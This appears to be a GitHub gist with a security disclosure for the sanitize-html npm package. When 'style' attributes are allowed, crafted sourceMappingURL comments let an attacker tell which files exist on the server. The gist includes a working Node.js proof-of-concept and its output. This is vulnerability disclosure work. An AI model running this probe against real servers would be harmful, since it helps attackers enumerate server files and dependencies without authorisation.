Skip to content

Instantly share code, notes, and snippets.

@Slonser

Slonser/REPORT.md Secret

Last active February 13, 2024 08:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Slonser/8b4d061abe6ee1b2e10c7242987674cf to your computer and use it in GitHub Desktop.
Save Slonser/8b4d061abe6ee1b2e10c7242987674cf to your computer and use it in GitHub Desktop.
Download ZIP
sanitize-html disclose files
Raw
REPORT.md

Overview

The sanitize-html package, when used on the backend and with the "style" attribute allowed, allows enumeration of files in the system (including project dependencies).

PoC

  1. npm i sanitize-html
  2. node index.js
// index.js
const sanitizeHtml = require('sanitize-html');

const file_exist = `<a style='background-image: url("/*# sourceMappingURL=./node_modules/sanitize-html/index.js */");'>@slonser_</a>`;
const file_notexist = `<a style='background-image: url("/*# sourceMappingURL=./node_modules/randomlibrary/index.js */");'>@slonser_</a>`;

const file_exist_clean = sanitizeHtml(file_exist, {
allowedAttributes: { ...sanitizeHtml.defaults.allowedAttributes, a: ['style'] },
})

const file_notexist_clean = sanitizeHtml(file_notexist, {
    allowedAttributes: { ...sanitizeHtml.defaults.allowedAttributes, a: ['style'] },
})
console.log(file_exist_clean, "// valid file path on backend")
console.log(file_notexist_clean, "// invalid file path on backend")

Output:

<a>@slonser_</a> // valid file path on backend
<a style="background-image:url(&quot;/*# sourceMappingURL=./node_modules/randomlibrary/index.js */&quot;)">@slonser_</a> // invalid file path on backend

When a file actually exists on the server (and is not a valid source map), we won't receive the "style" attribute. Otherwise, we will receive it.

Credit

Vsevolod Kokorin (Slonser) of Solidlab

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment